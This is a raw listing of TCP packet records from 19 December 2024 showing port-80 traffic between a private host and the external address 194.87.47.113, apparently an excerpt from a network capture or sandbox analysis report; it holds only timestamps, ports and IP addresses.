Dec 19, 2024 08:47:36.188960075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.189013958 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.189146996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.189735889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.189815044 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.190093040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.190560102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.190619946 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.190804958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.191349983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.191406965 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.191526890 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.192116022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.192209959 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.192363024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.193022013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.193034887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.193089008 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.193767071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.193815947 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.193979979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.194520950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.194574118 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.195370913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.195386887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.195467949 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.195729017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.196172953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.196280956 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.196367979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.196887016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.196928978 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.197367907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.197669029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.197751999 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.197945118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.198458910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.198525906 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.199119091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.199281931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.199295044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.199326992 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.200033903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.200086117 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.200299025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.200841904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.200974941 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.201196909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.201669931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.201729059 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.201792955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.202913046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.202975035 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.203265905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.203618050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.203674078 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.203716993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.204157114 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.204169989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.204210997 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.204803944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.204847097 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.205045938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.205636978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.205693007 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.206212997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.206551075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.206628084 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.206653118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.207170963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.207216978 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.207370996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.208051920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.208216906 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.208384991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.208916903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.209069967 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.209183931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.209640980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.209654093 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.209743977 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.210350990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.210444927 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.210983038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.211218119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.211230993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.211333036 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.362682104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.362896919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.362983942 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.363117933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.363471985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.363568068 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.363836050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.364193916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.364336967 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.364564896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.364912033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.365343094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.365413904 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.365652084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.366162062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.366225004 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.366972923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.366986036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.367043018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.367333889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.367604017 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.367738962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.368129969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.368277073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.368530989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.368712902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.368766069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.369426966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.369637012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.369754076 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.370249987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.370383024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.370933056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.371061087 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.371390104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.371921062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.372030973 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.372433901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.372623920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.372876883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.373225927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.373334885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.373739958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.373908997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.374020100 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.374232054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.374501944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.374618053 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.374913931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.375248909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.375324011 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.375654936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.375864983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.375953913 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.376441956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.376642942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.377219915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.377393961 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.377691984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.378106117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.378238916 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.378343105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.378439903 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.378871918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.378885984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.378932953 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.379633904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.379842997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.379889965 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.380528927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.380742073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.381470919 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.381767988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.382013083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.382025003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.382153988 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.382668972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.382839918 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.383028984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.383044004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.383131981 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.383754015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.384418964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.384629011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.384700060 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.384908915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.385262966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.385396957 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.385623932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.385951042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.386019945 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.386338949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.386746883 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.386749983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.387034893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.387135029 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.387526035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.387859106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.387929916 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.388319969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.388622999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.388670921 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.389185905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.389617920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.390032053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.390043974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.390115976 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.390115976 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.390710115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.390904903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.391108990 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.391505957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.391746998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.391786098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.392288923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.392528057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.393079996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.393083096 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.393291950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.393559933 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.393865108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.394102097 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.394190073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.394721031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.394736052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.394874096 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.395489931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.395634890 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.395762920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.396291018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.396928072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.397092104 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.397140980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.397155046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.397238970 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.398088932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.398766041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.398817062 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.399300098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.399588108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.399696112 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.399957895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.400111914 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.400187969 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.400512934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.400801897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.400882006 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.401038885 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.401237011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.401346922 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.401879072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.401997089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.402482033 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.402565956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.402832031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.403445959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.403460026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.403908968 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.404166937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.450335026 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.555098057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.555421114 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.555484056 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.555624962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.555638075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.555696011 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.556337118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.556719065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.556781054 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.557053089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.557573080 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.558053970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.558162928 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.558250904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.558741093 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.558789015 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.558868885 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.558959007 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.559406996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.560199976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.560213089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.560477972 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.560568094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.560993910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.561115026 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.561244011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.561427116 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.561816931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.562006950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.562058926 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.562546015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.562748909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.562839031 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.563411951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.563518047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.564168930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.564229012 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.564337015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.564924002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.564969063 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.565108061 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.565177917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.565717936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.565973043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.566028118 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.566543102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.566987038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.567025900 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.567276001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.567619085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.568114996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.568170071 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.568309069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.568905115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.568990946 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.569509029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.569715023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.569726944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.569750071 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.569777012 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.570501089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.570811033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.571270943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.571331024 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.571746111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.572046995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.572094917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.572362900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.572397947 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.572860003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.573692083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.573704004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.573731899 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.574016094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.574426889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.574485064 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.574934959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.575059891 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.575254917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.575558901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.575625896 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.576008081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.576235056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.576302052 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.576792002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.577038050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.577513933 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.577598095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.577994108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.578421116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.578433990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.578501940 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.578501940 CET	49707	80	192.168.2.7	194.87.47.113
